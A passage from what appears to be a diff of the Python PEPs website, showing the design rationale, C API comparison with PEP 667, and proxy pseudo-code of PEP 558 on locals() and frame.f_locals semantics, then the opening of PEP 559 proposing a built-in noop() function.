This type is what the reference implementation actually returns from PyObject_GetAttrString(frame, "f_locals") for optimized frames (i.e. when PyFrame_GetLocalsKind() returns PyLocals_SHALLOW_COPY).

Reducing the runtime overhead of trace hooks

As noted in [9], the implicit call to PyFrame_FastToLocals() in the Python trace hook support isn’t free, and could be rendered unnecessary if the frame proxy read values directly from the frame instead of getting them from the mapping.

As the new frame locals proxy type doesn’t require separate data refresh steps, this PEP incorporates Victor Stinner’s proposal to no longer implicitly call PyFrame_FastToLocalsWithError() before calling trace hooks implemented in Python.

Code using the new fast locals proxy objects will have the dynamic locals snapshot implicitly refreshed when accessing methods that need it, while code using the PyEval_GetLocals() API will implicitly refresh it when making that call.

The PEP necessarily also drops the implicit call to PyFrame_LocalsToFast() when returning from a trace hook, as that API now always raises an exception.

Rationale and Design Discussion


Changing locals() to return independent snapshots at function scope

The locals() builtin is a required part of the language, and in the reference implementation it has historically returned a mutable mapping with the following characteristics:

• each call to locals() returns the same mapping object
• for namespaces where locals() returns a reference to something other than the actual local execution namespace, each call to locals() updates the mapping object with the current state of the local variables and any referenced nonlocal cells
• changes to the returned mapping usually aren’t written back to the local variable bindings or the nonlocal cell references, but write backs can be triggered by doing one of the following:
  • installing a Python level trace hook (write backs then happen whenever the trace hook is called)
  • running a function level wildcard import (requires bytecode injection in Py3)
  • running an exec statement in the function’s scope (Py2 only, since exec became an ordinary builtin in Python 3)

Originally this PEP proposed to retain the first two of these properties, while changing the third in order to address the outright behaviour bugs that it can cause.

In [7] Nathaniel Smith made a persuasive case that we could make the behaviour of locals() at function scope substantially less confusing by retaining only the second property and having each call to locals() at function scope return an independent snapshot of the local variables and closure references rather than updating an implicitly shared snapshot.

As this revised design also made the implementation markedly easier to follow, the PEP was updated to propose this change in behaviour, rather than retaining the historical shared snapshot.

Keeping locals() as a snapshot at function scope

As discussed in [7], it would theoretically be possible to change the semantics of the locals() builtin to return the write-through proxy at function scope, rather than switching it to return independent snapshots.

This PEP doesn’t (and won’t) propose this as it’s a backwards incompatible change in practice, even though code that relies on the current behaviour is technically operating in an undefined area of the language specification.

Consider the following code snippet:

def example():
    x = 1
    locals()["x"] = 2
    print(x)

Even with a trace hook installed, that function will consistently print 1 on the current reference interpreter implementation:

>>> example()
1
>>> import sys
>>> def basic_hook(*args):
...     return basic_hook
...
>>> sys.settrace(basic_hook)
>>> example()
1

Similarly, locals() can be passed to the exec() and eval() builtins at function scope (either explicitly or implicitly) without risking unexpected rebinding of local variables or closure references.

Provoking the reference interpreter into incorrectly mutating the local variable state requires a more complex setup where a nested function closes over a variable being rebound in the outer function, and, due to the use of either threads, generators, or coroutines, it’s possible for a trace function to start running for the nested function before the rebinding operation in the outer function, but finish running after the rebinding operation has taken place (in which case the rebinding will be reverted, which is the bug reported in [1]).

In addition to preserving the de facto semantics which have been in place since PEP 227 introduced nested scopes in Python 2.1, the other benefit of restricting the write-through proxy support to the implementation-defined frame object API is that it means that only interpreter implementations which emulate the full frame API need to offer the write-through capability at all, and that JIT-compiled implementations only need to enable it when a frame introspection API is invoked, or a trace hook is installed, not whenever locals() is accessed at function scope.

Returning snapshots from locals() at function scope also means that static analysis for function level code will be more reliable, as only access to the frame machinery will allow rebinding of local and nonlocal variable references in a way that is hidden from static analysis.

What happens with the default args for eval() and exec()?

These are formally defined as inheriting globals() and locals() from the calling scope by default.

There isn’t any need for the PEP to change these defaults, so it doesn’t, and exec() and eval() will start running in a shallow copy of the local namespace when that is what locals() returns.

This behaviour will have potential performance implications, especially for functions with large numbers of local variables (e.g. if these functions are called in a loop, calling globals() and locals() once before the loop and then passing the namespaces into the function explicitly will give the same semantics and performance characteristics as the status quo, whereas relying on the implicit default would create a new shallow copy of the local namespace on each iteration).
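For example, a caller that wants to avoid the per-iteration copies can hoist the namespace lookups out of the loop (a sketch; run_snippets and its argument are hypothetical):

def run_snippets(snippets):
    # Capture the namespaces once, rather than letting exec() default to
    # taking a fresh locals() snapshot on every iteration.
    g, l = globals(), locals()
    for source in snippets:
        exec(source, g, l)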

(Note: the reference implementation draft PR has updated the locals(), vars(), eval(), and exec() builtins to use PyLocals_Get(). The dir() builtin still uses PyEval_GetLocals(), since it’s only using it to make a list from the keys.)

Additional considerations for eval() and exec() in optimized scopes

Note: while implementing PEP 667, it was noted that neither that PEP nor this one clearly explained the impact the locals() changes would have on code execution APIs like exec() and eval(). This section was added to this PEP’s rationale to better describe the impact and explain the intended benefits of the change.

When exec() was converted from a statement to a builtin function in Python 3.0 (part of the core language changes in PEP 3100), the associated implicit call to PyFrame_LocalsToFast() was removed, so it typically appears as if attempts to write to local variables with exec() in optimized frames are ignored:
>>> def f():
...     x = 0
...     exec("x = 1")
...     print(x)
...     print(locals()["x"])
...
>>> f()
0
0

In truth, the writes aren’t being ignored, they just aren’t being copied from the dictionary cache back to the optimized local variable array. The changes to the dictionary are then overwritten the next time the dictionary cache is refreshed from the array:

>>> def f():
...     x = 0
...     locals_cache = locals()
...     exec("x = 1")
...     print(x)
...     print(locals_cache["x"])
...     print(locals()["x"])
...
>>> f()
0
1
0

The behaviour becomes even stranger if a tracing function or another piece of code invokes PyFrame_LocalsToFast() before the cache is next refreshed. In those cases the change is written back to the optimized local variable array:

>>> from sys import _getframe
>>> from ctypes import pythonapi, py_object, c_int
>>> _locals_to_fast = pythonapi.PyFrame_LocalsToFast
>>> _locals_to_fast.argtypes = [py_object, c_int]
>>> def f():
...     _frame = _getframe()
...     _f_locals = _frame.f_locals
...     x = 0
...     exec("x = 1")
...     _locals_to_fast(_frame, 0)
...     print(x)
...     print(locals()["x"])
...     print(_f_locals["x"])
...
>>> f()
1
1
1

This situation was more common in Python 3.10 and earlier versions, as merely installing a tracing function was enough to trigger implicit calls to PyFrame_LocalsToFast() after every line of Python code. However, it can still happen in Python 3.11+ depending on exactly which tracing functions are active (e.g. interactive debuggers intentionally do this so that changes made at the debugging prompt are visible when code execution resumes).

All of the above comments in relation to exec() apply to any attempt to mutate the result of locals() in optimized scopes, and are the main reason that the locals() builtin docs contain this caveat:

    Note: The contents of this dictionary should not be modified; changes may not affect the values of local and free variables used by the interpreter.

While the exact wording in the library reference is not entirely explicit, both exec() and eval() have long used the results of calling globals() and locals() in the calling Python frame as their default execution namespace.

This was historically also equivalent to using the calling frame’s frame.f_globals and frame.f_locals attributes, but this PEP maps the default namespace arguments for exec() and eval() to globals() and locals() in the calling frame in order to preserve the property of defaulting to ignoring attempted writes to the local namespace in optimized scopes.

This poses a potential compatibility issue for some code, as with the previous implementation that returns the same dict when locals() is called multiple times in function scope, the following code usually worked due to the implicitly shared local variable namespace:

def f():
    exec('a = 0')  # equivalent to exec('a = 0', globals(), locals())
    exec('print(a)')  # equivalent to exec('print(a)', globals(), locals())
    print(locals())  # {'a': 0}
    # However, print(a) will not work here
f()

With locals() in an optimised scope returning the same shared dict for each call, it was possible to store extra “fake locals” in that dict. While these aren’t real locals known by the compiler (so they can’t be printed with code like print(a)), they can still be accessed via locals() and shared between multiple exec() calls in the same function scope. Furthermore, because they’re not real locals, they don’t get implicitly updated or removed when the shared cache is refreshed from the local variable storage array.

When the code in exec() tries to write to an existing local variable, the runtime behaviour gets harder to predict:

def f():
    a = None
    exec('a = 0')  # equivalent to exec('a = 0', globals(), locals())
    exec('print(a)')  # equivalent to exec('print(a)', globals(), locals())
    print(locals())  # {'a': None}
f()

print(a) will print None because the implicit locals() call in exec() refreshes the cached dict with the actual values on the frame. This means that, unlike the “fake” locals created by writing back to locals() (including via previous calls to exec()), the real locals known by the compiler can’t easily be modified by exec() (it can be done, but it requires both retrieving the frame.f_locals attribute to enable writes back to the frame, and then invoking PyFrame_LocalsToFast(), as shown using ctypes above).

As noted in the Motivation section, this confusing side effect happens even if the local variable is only defined after the exec() calls:

>>> def f():
...     exec("a = 0")
...     exec("print('a' in locals())") # Printing 'a' directly won't work
...     print(locals())
...     a = None
...     print(locals())
...
>>> f()
False
{}
{'a': None}

Because a is a real local variable that is not currently bound to a value, it gets explicitly removed from the dictionary returned by locals() whenever locals() is called prior to the a = None line. This removal is intentional, as it allows the contents of locals() to be updated correctly in optimized scopes when del statements are used to delete previously bound local variables.

As noted in the ctypes example, the above behavioural description may be invalidated if the CPython PyFrame_LocalsToFast() API gets invoked while the frame is still running. In that case, the changes to a might become visible to the running code, depending on exactly when that API is called (and whether the frame has been primed for locals modification by accessing the frame.f_locals attribute).

As described above, two options were considered to replace this confusing behaviour:

• make locals() return write-through proxy instances (similar to frame.f_locals)
• make locals() return genuinely independent snapshots so that attempts to change the values of local variables via exec() would be consistently ignored without any of the caveats noted above

The PEP chooses the second option for the following reasons:

• returning independent snapshots in optimized scopes preserves the Python 3.0 change to exec() that resulted in attempts to mutate local variables via exec() being ignored in most cases
• the distinction between “locals() gives an instantaneous snapshot of the local variables in optimized scopes, and read/write access in other scopes” and “frame.f_locals gives read/write access to the local variables in all scopes, including optimized scopes” allows the intent of a piece of code to be clearer than it would be if both APIs granted full read/write access in optimized scopes, even when write access wasn’t needed or desired
• in addition to improving clarity for human readers, ensuring that name rebinding in optimized scopes remains lexically visible in the code (as long as the frame introspection APIs are not accessed) allows compilers and interpreters to apply related performance optimizations more consistently
• only Python implementations that support the optional frame introspection APIs will need to provide the new write-through proxy support for optimized frames

With the semantic changes to locals() in this PEP, it becomes much easier to explain the behavior of exec() and eval(): in optimized scopes, they will never implicitly affect local variables; in other scopes, they will always implicitly affect local variables. In optimized scopes, any implicit assignment to the local variables will be discarded when the code execution API returns, since a fresh copy of the local variables is used on each invocation.

Retaining the internal frame value cache

Retaining the internal frame value cache results in some visible quirks when frame proxy instances are kept around and re-used after name binding and unbinding operations have been executed on the frame.

The primary reason for retaining the frame value cache is to maintain backwards compatibility with the PyEval_GetLocals() API. That API returns a borrowed reference, so it must refer to persistent state stored on the frame object. Storing a fast locals proxy object on the frame creates a problematic reference cycle, so the cleanest option is to instead continue to return a frame value cache, just as this function has done since optimised frames were first introduced.

With the frame value cache being kept around anyway, it then further made sense to rely on it to simplify the fast locals proxy mapping implementation.

Note: the fact PEP 667 doesn’t use the internal frame value cache as part of the write-through proxy implementation is the key Python level difference between the two PEPs.

Changing the frame API semantics in regular operation

+

Note: when this PEP was first written, it predated the Python 3.11 change to drop the +implicit writeback of the frame local variables whenever a tracing function was installed, +so making that change was included as part of the proposal.

+

Earlier versions of this PEP proposed having the semantics of the frame +f_locals attribute depend on whether or not a tracing hook was currently +installed - only providing the write-through proxy behaviour when a tracing hook +was active, and otherwise behaving the same as the historical locals() +builtin.

+

That was adopted as the original design proposal for a couple of key reasons, +one pragmatic and one more philosophical:

+
    +
  • Object allocations and method wrappers aren’t free, and tracing functions aren’t the only operations that access frame locals from outside the function. Restricting the changes to tracing mode meant that the additional memory and execution time overhead of these changes would be as close to zero as possible in regular operation.
  • +
  • “Don’t change what isn’t broken”: the current tracing mode problems are caused +by a requirement that’s specific to tracing mode (support for external +rebinding of function local variable references), so it made sense to also +restrict any related fixes to tracing mode
  • +
+

However, actually attempting to implement and document that dynamic approach highlighted the fact that it creates a really subtle, runtime-state-dependent distinction in how frame.f_locals works, along with several new edge cases around how f_locals behaves as trace functions are added and removed.

+

Accordingly, the design was switched to the current one, where +frame.f_locals is always a write-through proxy, and locals() is always +a snapshot, which is both simpler to implement and easier to explain.

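A sketch of the resulting split (illustrative only; the commented results assume the proposed semantics are in place):

+import sys
+
+def demo():
+    a = 1
+    snapshot = locals()                 # independent snapshot
+    proxy = sys._getframe().f_locals    # write-through proxy
+    proxy["a"] = 2                      # rebinds the real local variable
+    print(a)                            # -> 2 under this proposal
+    print(snapshot["a"])                # -> 1 (snapshot is unaffected)
+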
+

Regardless of how the CPython reference implementation chooses to handle this, +optimising compilers and interpreters also remain free to impose additional +restrictions on debuggers, such as making local variable mutation through frame +objects an opt-in behaviour that may disable some optimisations (just as the +emulation of CPython’s frame API is already an opt-in flag in some Python +implementations).

+
+
+

Continuing to support storing additional data on optimised frames

+

One of the draft iterations of this PEP proposed removing the ability to store +additional data on optimised frames by writing to frame.f_locals keys that +didn’t correspond to local or closure variable names on the underlying frame.

+

While this idea offered some attractive simplification of the fast locals proxy +implementation, pdb stores __return__ and __exception__ values on +arbitrary frames, so the standard library test suite fails if that functionality +no longer works.

+

Accordingly, the ability to store arbitrary keys was retained, at the expense of certain operations on proxy objects being slower than they otherwise could be (since they can’t assume that only names defined on the code object will be accessible through the proxy).

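For instance, the following pdb-style usage keeps working (an illustrative sketch assuming the proposed write-through proxy):

+import sys
+
+def stash_extra_state():
+    frame = sys._getframe()
+    # "__return__" is not a local variable name on this frame, but
+    # storing it is still permitted (pdb relies on exactly this)
+    frame.f_locals["__return__"] = 42
+    return frame.f_locals["__return__"]
+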
+

It is expected that the exact details of the interaction between the fast locals +proxy and the f_locals value cache on the underlying frame will evolve over +time as opportunities for improvement are identified.

+
+
+

Historical semantics at function scope

+

The current semantics of mutating locals() and frame.f_locals in CPython +are rather quirky due to historical implementation details:

+
    +
  • actual execution uses the fast locals array for local variable bindings and +cell references for nonlocal variables
  • +
  • there’s a PyFrame_FastToLocals operation that populates the frame’s +f_locals attribute based on the current state of the fast locals array +and any referenced cells. This exists for three reasons:
      +
    • allowing trace functions to read the state of local variables
    • +
    • allowing traceback processors to read the state of local variables
    • +
    • allowing locals() to read the state of local variables
    • +
    +
  • +
  • a direct reference to frame.f_locals is returned from locals(), so if you hand out multiple concurrent references, then all those references will be to the exact same dictionary (demonstrated in the sketch after this list)
  • +
  • the two common calls to the reverse operation, PyFrame_LocalsToFast, were +removed in the migration to Python 3: exec is no longer a statement (and +hence can no longer affect function local namespaces), and the compiler now +disallows the use of from module import * operations at function scope
  • +
  • however, two obscure calling paths remain: PyFrame_LocalsToFast is called +as part of returning from a trace function (which allows debuggers to make +changes to the local variable state), and you can also still inject the +IMPORT_STAR opcode when creating a function directly from a code object +rather than via the compiler
  • +
+
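The shared-dictionary quirk mentioned above can be demonstrated directly on historical CPython versions (a sketch of the pre-existing behaviour, not of anything this PEP proposes):

+def historical_quirk():
+    x = 1
+    first = locals()
+    y = 2
+    second = locals()
+    # Both calls return the same frame-cached dict, refreshed in
+    # place, so the earlier reference sees the later update
+    assert first is second
+    assert first["y"] == 2
+
+historical_quirk()
+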

This proposal deliberately doesn’t formalise these semantics as is, since they +only make sense in terms of the historical evolution of the language and the +reference implementation, rather than being deliberately designed.

+
+
+

Proposing several additions to the stable C API/ABI

+

Historically, the CPython C API (and subsequently, the stable ABI) has +exposed only a single API function related to the Python locals builtin: +PyEval_GetLocals(). However, as it returns a borrowed reference, it is +not possible to adapt that interface directly to supporting the new locals() +semantics proposed in this PEP.

+

An earlier iteration of this PEP proposed a minimalist adaptation to the new +semantics: one C API function that behaved like the Python locals() builtin, +and another that behaved like the frame.f_locals descriptor (creating and +returning the write-through proxy if necessary).

+

The feedback [8] on that version of the C API was that it was too heavily based +on how the Python level semantics were implemented, and didn’t account for the +behaviours that authors of C extensions were likely to need.

+

The broader API now being proposed came from grouping the potential reasons for +wanting to access the Python locals() namespace from an extension module +into the following cases:

+
    +
  • needing to exactly replicate the semantics of the Python level locals() +operation. This is the PyLocals_Get() API.
  • +
  • needing to behave differently depending on whether writes to the result of +PyLocals_Get() will be visible to Python code or not. This is handled by +the PyLocals_GetKind() query API.
  • +
  • always wanting a mutable namespace that has been pre-populated from the +current Python locals() namespace, but not wanting any changes to +be visible to Python code. This is the PyLocals_GetCopy() API.
  • +
  • always wanting a read-only view of the current locals namespace, without +incurring the runtime overhead of making a full copy each time. This isn’t +readily offered for optimised frames due to the need to check whether names +are currently bound or not, so no specific API is being added to cover it.
  • +
+

Historically, these kinds of checks and operations would only have been +possible if a Python implementation emulated the full CPython frame API. With +the proposed API, extension modules can instead ask more clearly for the +semantics that they actually need, giving Python implementations more +flexibility in how they provide those capabilities.

+
+
+

Comparison with PEP 667

+

NOTE: the comparison below is against PEP 667 as it was in December 2021. +It does not reflect the state of PEP 667 as of April 2024 (when this PEP was +withdrawn in favour of proceeding with PEP 667).

+

PEP 667 offers a partially competing proposal for this PEP that suggests it +would be reasonable to eliminate the internal frame value cache on optimised +frames entirely.

+

These changes were originally offered as amendments to PEP 558, and the PEP +author rejected them for three main reasons:

+
    +
  • the initial claim that PyEval_GetLocals() was unfixable because it returns +a borrowed reference was simply false, as it is still working in the PEP 558 +reference implementation. All that is required to keep it working is to +retain the internal frame value cache and design the fast locals proxy in +such a way that it is reasonably straightforward to keep the cache up to date +with changes in the frame state without incurring significant runtime overhead +when the cache isn’t needed. Given that this claim is false, the proposal to +require that all code using the PyEval_GetLocals() API be rewritten to use +a new API with different refcounting semantics fails PEP 387’s requirement +that API compatibility breaks should have a large benefit to breakage ratio +(since there’s no significant benefit gained from dropping the cache, no code +breakage can be justified). The only genuinely unfixable public API is +PyFrame_LocalsToFast() (which is why both PEPs propose breaking that).
  • +
  • without some form of internal value cache, the API performance characteristics +of the fast locals proxy mapping become quite unintuitive. len(proxy), for +example, becomes consistently O(n) in the number of variables defined on the +frame, as the proxy has to iterate over the entire fast locals array to see +which names are currently bound to values before it can determine the answer. +By contrast, maintaining an internal frame value cache potentially allows +proxies to largely be treated as normal dictionaries from an algorithmic +complexity point of view, with allowances only needing to be made for the +initial implicit O(n) cache refresh that runs the first time an operation +that relies on the cache being up to date is executed.
  • +
  • the claim that a cache-free implementation would be simpler is highly suspect, +as PEP 667 includes only a pure Python sketch of a subset of a mutable mapping +implementation, rather than a full-fledged C implementation of a new mapping +type integrated with the underlying data storage for optimised frames. +PEP 558’s fast locals proxy implementation delegates heavily to the +frame value cache for the operations needed to fully implement the mutable +mapping API, allowing it to re-use the existing dict implementations of the +following operations:
      +
    • __len__
    • +
    • __str__
    • +
    • __or__ (dict union)
    • +
    • __iter__ (allowing the dict_keyiterator type to be reused)
    • +
    • __reversed__ (allowing the dict_reversekeyiterator type to be reused)
    • +
    • keys() (allowing the dict_keys type to be reused)
    • +
    • values() (allowing the dict_values type to be reused)
    • +
    • items() (allowing the dict_items type to be reused)
    • +
    • copy()
    • +
    • popitem()
    • +
    • value comparison operations
    • +
    +
  • +
+

Of the three reasons, the first is the most important (since we need compelling +reasons to break API backwards compatibility, and we don’t have them).

+

However, after reviewing PEP 667’s proposed Python level semantics, the author +of this PEP eventually agreed that they would be simpler for users of the +Python locals() API, so this distinction between the two PEPs has been +eliminated: regardless of which PEP and implementation is accepted, the fast +locals proxy object always provides a consistent view of the current state +of the local variables, even if this results in some operations becoming O(n) +that would be O(1) on a regular dictionary (specifically, len(proxy) +becomes O(n), since it needs to check which names are currently bound, and proxy +mapping comparisons avoid relying on the length check optimisation that allows +differences in the number of stored keys to be detected quickly for regular +mappings).

+

Due to the adoption of these non-standard performance characteristics in the +proxy implementation, the PyLocals_GetView() and PyFrame_GetLocalsView() +C APIs were also removed from the proposal in this PEP.

+

This leaves the only remaining points of distinction between the two PEPs as +specifically related to the C API:

+
    +
  • PEP 667 still proposes completely unnecessary C API breakage (the programmatic +deprecation and eventual removal of PyEval_GetLocals(), +PyFrame_FastToLocalsWithError(), and PyFrame_FastToLocals()) without +justification, when it is entirely possible to keep these working indefinitely +(and interoperably) given a suitably designed fast locals proxy implementation
  • +
  • the fast locals proxy handling of additional variables is defined in this PEP +in a way that is fully interoperable with the existing PyEval_GetLocals() +API. In the proxy implementation proposed in PEP 667, users of the new frame +API will not see changes made to additional variables by users of the old API, +and changes made to additional variables via the old API will be overwritten +on subsequent calls to PyEval_GetLocals().
  • +
  • the PyLocals_Get() API in this PEP is called PyEval_Locals() in PEP 667. +This function name is a bit strange as it lacks a verb, making it look more +like a type name than a data access API.
  • +
  • this PEP adds PyLocals_GetCopy() and PyFrame_GetLocalsCopy() APIs to +allow extension modules to easily avoid incurring a double copy operation in +frames where PyLocals_Get() already makes a copy
  • +
  • this PEP adds PyLocals_Kind, PyLocals_GetKind(), and +PyFrame_GetLocalsKind() to allow extension modules to identify when code +is running at function scope without having to inspect non-portable frame and +code object APIs (without the proposed query API, the existing equivalent to +the new PyLocals_GetKind() == PyLocals_SHALLOW_COPY check is to include +the CPython internal frame API headers and check if +_PyFrame_GetCode(PyEval_GetFrame())->co_flags & CO_OPTIMIZED is set)
  • +
+

The Python pseudo-code below is based on the implementation sketch presented +in PEP 667 as of the time of writing (2021-10-24). The differences that +provide the improved interoperability between the new fast locals proxy API +and the existing PyEval_GetLocals() API are noted in comments.

+

As in PEP 667, all attributes that start with an underscore are invisible and +cannot be accessed directly. They serve only to illustrate the proposed design.

+

For simplicity (and as in PEP 667), the handling of module and class level +frames is omitted (they’re much simpler, as _locals is the execution +namespace, so no translation is required).

+
NULL: Object # NULL is a singleton representing the absence of a value.
+
+class CodeType:
+
+    _name_to_offset_mapping_impl: dict | NULL
+    ...
+
+    def __init__(self, ...):
+        self._name_to_offset_mapping_impl = NULL
+        self._variable_names = deduplicate(
+            self.co_varnames + self.co_cellvars + self.co_freevars
+        )
+        ...
+
+    def _is_cell(self, offset):
+        ... # How the interpreter identifies cells is an implementation detail
+
+    @property
+    def _name_to_offset_mapping(self):
+        "Mapping of names to offsets in local variable array."
+        if self._name_to_offset_mapping_impl is NULL:
+
+            self._name_to_offset_mapping_impl = {
+                name: index for (index, name) in enumerate(self._variable_names)
+            }
+        return self._name_to_offset_mapping_impl
+
+class FrameType:
+
+    _fast_locals : array[Object] # The values of the local variables, items may be NULL.
+    _locals: dict | NULL # Dictionary returned by PyEval_GetLocals()
+
+    def __init__(self, ...):
+        self._locals = NULL
+        ...
+
+    @property
+    def f_locals(self):
+        return FastLocalsProxy(self)
+
+class FastLocalsProxy:
+
+    __slots__ = ("_frame",)
+
+    def __init__(self, frame:FrameType):
+        self._frame = frame
+
+    def _set_locals_entry(self, name, val):
+        f = self._frame
+        if f._locals is NULL:
+            f._locals = {}
+        f._locals[name] = val
+
+    def __getitem__(self, name):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            val = f._fast_locals[index]
+            if val is NULL:
+                raise KeyError(name)
+            if co._is_cell(index):
+                val = val.cell_contents
+                if val is NULL:
+                    raise KeyError(name)
+            # PyEval_GetLocals() interop: implicit frame cache refresh
+            self._set_locals_entry(name, val)
+            return val
+        # PyEval_GetLocals() interop: frame cache may contain additional names
+        if f._locals is NULL:
+            raise KeyError(name)
+        return f._locals[name]
+
+    def __setitem__(self, name, val):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            if co._is_cell(index):
+                # Cells live in the fast locals array; write their contents
+                cell = f._fast_locals[index]
+                cell.cell_contents = val
+            else:
+                f._fast_locals[index] = val
+        # PyEval_GetLocals() interop: implicit frame cache update
+        # even for names that are part of the fast locals array
+        self._set_locals_entry(name, val)
+
+    def __delitem__(self, name):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            if co._is_cell(index):
+                cell = f._fast_locals[index]
+                cell.cell_contents = NULL
+            else:
+                f._fast_locals[index] = NULL
+            # PyEval_GetLocals() interop: implicit frame cache update
+            # even for names that are part of the fast locals array
+            if f._locals is not NULL:
+                f._locals.pop(name, None)
+        elif f._locals is not NULL:
+            # Extra keys live only in the frame value cache
+            del f._locals[name]
+        else:
+            raise KeyError(name)
+
+    def __iter__(self):
+        f = self._frame
+        co = f.f_code
+        for index, name in enumerate(co._variable_names):
+            val = f._fast_locals[index]
+            if val is NULL:
+                continue
+            if co._is_cell(index):
+                val = val.cell_contents
+                if val is NULL:
+                    continue
+            yield name
+        if f._locals is not NULL:
+            for name in f._locals:
+                # Yield any extra names not defined on the frame
+                if name in co._name_to_offset_mapping:
+                    continue
+                yield name
+
+    def popitem(self):
+        for name in self:
+            val = self[name]
+            # PyEval_GetLocals() interop: implicit frame cache update
+            # even for names that are part of the fast locals array
+            del self[name]
+            return name, val
+        raise KeyError("popitem(): frame locals proxy is empty")
+
+    def _sync_frame_cache(self):
+        # This method underpins PyEval_GetLocals, PyFrame_FastToLocals,
+        # PyFrame_GetLocals, PyLocals_Get, mapping comparison, etc.
+        f = self._frame
+        co = f.f_code
+        if f._locals is NULL:
+            f._locals = {}
+        for index, name in enumerate(co._variable_names):
+            val = f._fast_locals[index]
+            if val is NULL:
+                f._locals.pop(name, None)
+                continue
+            if co._is_cell(index):
+                val = val.cell_contents
+                if val is NULL:
+                    f._locals.pop(name, None)
+                    continue
+            f._locals[name] = val
+
+    def __len__(self):
+        self._sync_frame_cache()
+        return len(self._frame._locals)
+
+
+

Note: the simplest way to convert the earlier iterations of the PEP 558 +reference implementation into a preliminary implementation of the now proposed +semantics is to remove the frame_cache_updated checks in affected operations, +and instead always sync the frame cache in those methods. Adopting that approach +changes the algorithmic complexity of the following operations as shown (where +n is the number of local and cell variables defined on the frame):

+
+
    +
  • __len__: O(1) -> O(n)
  • +
  • value comparison operations: no longer benefit from O(1) length check shortcut
  • +
  • __iter__: O(1) -> O(n)
  • +
  • __reversed__: O(1) -> O(n)
  • +
  • keys(): O(1) -> O(n)
  • +
  • values(): O(1) -> O(n)
  • +
  • items(): O(1) -> O(n)
  • +
  • popitem(): O(1) -> O(n)
  • +
+
+

The length check and value comparison operations have relatively limited opportunities for improvement: without allowing usage of a potentially stale cache, the only way to know how many variables are currently bound is to iterate over all of them and check, and if the implementation is going to spend that many cycles on an operation anyway, it may as well spend them updating the frame value cache and then consuming the result. These operations are O(n) in both this PEP and in PEP 667. Customised implementations could be provided that are faster than updating the frame cache, but it’s far from clear that the extra code complexity needed to speed these operations up would be worthwhile when it only offers a linear performance improvement rather than an algorithmic complexity improvement.

+

The O(1) nature of the other operations can be restored by adding implementation +code that doesn’t rely on the value cache being up to date.

+

Keeping the iterator/iterable retrieval methods as O(1) will involve +writing custom replacements for the corresponding builtin dict helper types, +just as proposed in PEP 667. As illustrated above, the implementations would +be similar to the pseudo-code presented in PEP 667, but not identical (due to +the improved PyEval_GetLocals() interoperability offered by this PEP +affecting the way it stores extra variables).

+

popitem() can be improved from “always O(n)” to “O(n) worst case” by +creating a custom implementation that relies on the improved iteration APIs.

+

To ensure stale frame information is never presented in the Python fast locals +proxy API, these changes in the reference implementation will need to be +implemented before merging.

+

The current implementation at the time of writing (2021-10-24) also still stores a copy of the fast refs mapping on each frame rather than storing a single instance on the underlying code object (as it still stores cell references directly, rather than checking for cells on each fast locals array access). Fixing this would also be required before merging.

+
+
+
+

Implementation

+

The reference implementation update is in development as a draft pull +request on GitHub ([6]).

+
+
+

Acknowledgements

+

Thanks to Nathaniel J. Smith for proposing the write-through proxy idea in +[1] and pointing out some critical design flaws in earlier iterations of the +PEP that attempted to avoid introducing such a proxy.

+

Thanks to Steve Dower and Petr Viktorin for asking that more attention be paid +to the developer experience of the proposed C API additions [8] [13].

+

Thanks to Larry Hastings for the suggestion on how to use enums in the stable +ABI while ensuring that they safely support typecasting from arbitrary +integers.

+

Thanks to Mark Shannon for pushing for further simplification of the C level +API and semantics, as well as significant clarification of the PEP text (and for +restarting discussion on the PEP in early 2021 after a further year of +inactivity) [10] [11] [12]. Mark’s comments that were ultimately published as +PEP 667 also directly resulted in several implementation efficiency improvements +that avoid incurring the cost of redundant O(n) mapping refresh operations +when the relevant mappings aren’t used, as well as the change to ensure that +the state reported through the Python level f_locals API is never stale.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0558.rst

+

Last modified: 2024-08-05 03:54:25 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0559/index.html b/pep-0559/index.html
new file mode 100644
index 00000000000..bee48914099
--- /dev/null
+++ b/pep-0559/index.html
@@ -0,0 +1,212 @@
+PEP 559 – Built-in noop() | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 559 – Built-in noop()

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
09-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a new built-in function called noop() which does +nothing but return None.

+
+
+

Rationale

+

It is trivial to implement a no-op function in Python. It’s so easy, in fact, that many people implement it over and over again. It would be useful in many cases to have a common built-in function that does nothing.

+

One use case would be for PEP 553, where you could set the breakpoint +environment variable to the following in order to effectively disable it:

+
$ setenv PYTHONBREAKPOINT=noop
+
+
+
+
+

Implementation

+

The Python equivalent of the noop() function is exactly:

+
def noop(*args, **kws):
+    return None
+
+
+

The C built-in implementation is available as a pull request [1].

+
+
+

Rejected alternatives

+
+

noop() returns something

+

YAGNI.

+

This is rejected because it complicates the semantics. For example, if you +always return both *args and **kws, what do you return when none of +those are given? Returning a tuple of ((), {}) is kind of ugly, but +provides consistency. But you might also want to just return None since +that’s also conceptually what the function was passed.

+

Or, what if you pass in exactly one positional argument, e.g. noop(7). Do +you return 7 or ((7,), {})? And so on.

+

The author claims that you won’t ever need the return value of noop() so +it will always return None.

+

Coghlan’s Dialogs (edited for formatting):

+
+
My counterargument to this would be map(noop, iterable), +sorted(iterable, key=noop), etc. (filter, max, and +min all accept callables that accept a single argument, as do +many of the itertools operations).

Making noop() a useful default function in those cases just +needs the definition to be:

+
def noop(*args, **kwds):
+    return args[0] if args else None
+
+
+

The counterargument to the counterargument is that using None +as the default in all these cases is going to be faster, since it +lets the algorithm skip the callback entirely, rather than calling +it and having it do nothing useful.

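Several builtins already treat None this way (illustrative only):

+# key=None lets sorted() skip the key call entirely, and
+# filter(None, ...) skips calling a predicate
+assert sorted([3, 1, 2], key=None) == [1, 2, 3]
+assert list(filter(None, [0, 1, "", "x"])) == [1, "x"]
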